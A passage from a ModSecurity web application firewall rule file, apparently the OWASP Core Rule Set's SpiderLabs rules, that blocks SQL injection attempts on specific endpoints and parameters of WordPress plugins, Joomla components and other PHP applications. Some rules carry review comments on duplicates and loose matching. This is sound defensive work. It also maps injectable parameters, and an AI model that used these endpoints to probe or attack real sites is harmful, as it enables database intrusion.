Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012368) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Bexfront sid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /bexfront.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012368,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Bexfront sid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:sid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Bexfront sid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012378) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Woltlab Burning Board katid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /hilfsmittel.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012378,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Woltlab Burning Board katid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains action=read" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:katid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Woltlab Burning Board katid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012417) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UPDATE SecRule REQUEST_LINE "@contains 
/wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012417,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:post_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012425) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SOPHIA CMS SQL Injection Attempt -- dsp_page.cfm pageid UPDATE SecRule REQUEST_LINE "@contains /dsp_page.cfm" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012425,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS SOPHIA CMS SQL Injection Attempt -- dsp_page.cfm pageid UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:pageid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SOPHIA CMS SQL Injection Attempt -- dsp_page.cfm pageid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012436) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UPDATE SecRule REQUEST_LINE "@contains /wp-content/plugins/forum-server/feed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012436,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:topic/' "@gt 0" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012473) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS All In One Control Panel SQL Injection Attempt -- cp_menu_data_file.php menu UPDATE SecRule REQUEST_LINE "@contains /public/code/cp_menu_data_file.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012473,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS All In One Control Panel SQL Injection Attempt -- cp_menu_data_file.php menu UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:menu/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS All In One Control Panel SQL Injection Attempt -- cp_menu_data_file.php menu UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012482) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UPDATE SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/massedit_album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012482,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:gall_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin SQL Injection Attempt -- massedit_album.php gall_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # 
(2012490) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Keynect Ecommerce SQL Injection Attempt -- products.php ctf UPDATE SecRule REQUEST_LINE "@contains /products.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012490,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Keynect Ecommerce SQL Injection Attempt -- products.php ctf UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:ctf/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Keynect Ecommerce SQL Injection Attempt -- products.php ctf UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012560) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Shape Web Solutions imprimir.php UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /imprimir.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012560,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Shape Web Solutions imprimir.php UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Shape Web Solutions imprimir.php UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012570) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS coRED CMS rubID Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /content/rubric/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012570,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS coRED CMS rubID Parameter UPDATE SET SQL Injection 
Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/SQL_INJECTION.*ARGS:rubID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS coRED CMS rubID Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# Rule 2012580 (mySeatXT autocomplete.php / field). Two-link chain: REQUEST_LINE
# must contain "/web/classes/autocomplete.php" and at least one TX variable name
# must match /SQL_INJECTION.*ARGS:field/. On a full match the rule adds
# tx.critical_anomaly_score to tx.anomaly_score and sets tx.msg.
# NOTE(review): rule 2012600 directly below has the same variables, operators, msg
# and actions; only id and rev differ. With both enabled, one request adds
# tx.critical_anomaly_score twice and the same message is raised under two ids.
# Keep one of the two (for example SecRuleRemoveById on the other) unless the
# double weight is intended.
# (2012580) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS mySeatXT SQL Injection Attempt autocomplete.php field UPDATE
SecRule REQUEST_LINE "@contains /web/classes/autocomplete.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012580,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS mySeatXT SQL Injection Attempt autocomplete.php field UPDATE',tag:'web-application-attack'"
SecRule &TX:'/SQL_INJECTION.*ARGS:field/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS mySeatXT SQL Injection Attempt autocomplete.php field UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# Rule 2012600: same path literal, TX name regex, msg and actions as rule 2012580
# above; it differs only in id:2012600 and rev:1 (see the note on 2012580).
# (2012600) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS mySeatXT SQL Injection Attempt autocomplete.php field UPDATE
SecRule REQUEST_LINE "@contains /web/classes/autocomplete.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012600,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS mySeatXT SQL Injection Attempt autocomplete.php field UPDATE',tag:'web-application-attack'"
SecRule &TX:'/SQL_INJECTION.*ARGS:field/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS mySeatXT SQL Injection Attempt autocomplete.php field UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2012677) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Andy 
PHP Knowledgebase SQL Injection Attempt pdfgen.php pdfa UPDATE SecRule REQUEST_LINE "@contains /plugins/pdfClasses/pdfgen.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012677,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Andy PHP Knowledgebase SQL Injection Attempt pdfgen.php pdfa UPDATE',tag:'web-application-attack'" SecRule &TX:'/SQL_INJECTION.*ARGS:pdfa/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Andy PHP Knowledgebase SQL Injection Attempt pdfgen.php pdfa UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012655) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Nuke Surveys pollID parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /modules/Surveys/modules.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012655,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Nuke Surveys pollID parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains name=Surveys" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:pollID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Nuke Surveys pollID parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012665) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vBulletin cChatBox messageid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /cchatbox.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012665,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS vBulletin cChatBox messageid Parameter UPDATE 
SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,46635'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:messageid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vBulletin cChatBox messageid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012702) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS eGroupware loaddetails.php script UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /samples/with_db/loaddetails.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012702,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS eGroupware loaddetails.php script UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS eGroupware loaddetails.php script UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012719) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS I-Escorts Directory country_id parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /country_escorts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012719,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS I-Escorts Directory country_id parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:country_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS I-Escorts Directory country_id parameter UPDATE SET SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012749) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpRS id parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /model-kits.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012749,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS phpRS id parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpRS id parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012792) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS KLINK txtCodiInfo parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /interna.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012792,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS KLINK txtCodiInfo parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:txtCodiInfo/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS KLINK txtCodiInfo parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012833) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_hello UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012833,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_hello UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hello" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:secid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_hello UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012876) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TCExam tce_xml_user_results.php script UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /admin/code/tce_xml_user_results.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012876,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS TCExam tce_xml_user_results.php script UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:startdate/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TCExam tce_xml_user_results.php script UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012991) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TEDE Simplificado processaPesquisa.php script UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /tde_busca/processaPesquisa.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012991,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS TEDE Simplificado processaPesquisa.php script UPDATE SET SQL Injection 
Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TEDE Simplificado processaPesquisa.php script UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2013084) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP link Directory sbcat_id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /showcats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013084,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS PHP link Directory sbcat_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,46048'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:sbcat_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP link Directory sbcat_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2013129) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SoftMP3 search Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /minbrowse.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013129,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SoftMP3 search Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:search/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SoftMP3 search Parameter UPDATE SET SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2013159) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/flash-album-gallery/lib/hitcounter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013159,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:pid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2013231) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Immophp annonce parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /annonce_detail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013231,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Immophp annonce parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,48341'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:annonce/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Immophp annonce parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2013307) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nuke Evolution Xtreme pid Parameter UPDATE SET SQL 
# Injection Attempt
#
# Rule 2013307 is a five-link chain; the actions on the last link run only
# when every link matches:
#   1. the request line contains /modules.php (this link applies
#      urlDecodeUni, htmlEntityDecode and normalisePathWin first)
#   2. the request line contains "GET "
#   3. the request line contains name=Tutorials
#   4. the request line contains t_op=showtutorial
#   5. at least one TX variable whose name matches
#      /SQL_INJECTION.*ARGS:pid/ exists (the & prefix yields a count)
# On a full match the chain adds tx.critical_anomaly_score to
# tx.anomaly_score, sets tx.msg and adds part E to the audit log.
#
# NOTE(review): nothing in this chain looks for the UPDATE ... SET keywords
# named in msg. Link 5 only checks that some other rule has already stored
# a TX variable with an SQL_INJECTION name for this parameter. Which rules
# do that is not visible here, so confirm they are loaded before this file.
# NOTE(review): the selector regex is not anchored after "pid", so a TX
# variable stored for a parameter such as pid2 also satisfies link 5.
# NOTE(review): links 2-4 carry no t: actions of their own; presumably they
# run with whatever SecDefaultAction provides - confirm.
SecRule REQUEST_LINE "@contains /modules.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013307,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Nuke Evolution Xtreme pid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains name=Tutorials" "chain"
SecRule REQUEST_LINE "@contains t_op=showtutorial" "chain"
SecRule &TX:'/SQL_INJECTION.*ARGS:pid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nuke Evolution Xtreme pid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2013471) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UPDATE SET SQL Injection Attempt
#
# Four-link chain: the request line contains /index.php, "GET " and
# option=com_community, and a TX variable matching
# /SQL_INJECTION.*ARGS:userid/ exists.
# NOTE(review): @contains on REQUEST_LINE matches anywhere in the line, so
# /index.php and option=com_community are not tied to the path and the
# query string respectively.
# NOTE(review): the chain requires "GET " in the request line, so the same
# parameter sent with another method does not match this rule.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013471,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_community" "chain"
SecRule &TX:'/SQL_INJECTION.*ARGS:userid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# Named marker closing this rule file. Presumably the target of a
# skipAfter:END_SLR_ET_SQLI_RULES action earlier in the file (not visible
# here) - confirm.
SecMarker END_SLR_ET_SQLI_RULES
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_crs_46_slr_et_wordpress_attacks.conf�0000664�0000000�0000000�00000262141�12164572564�0034334�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP 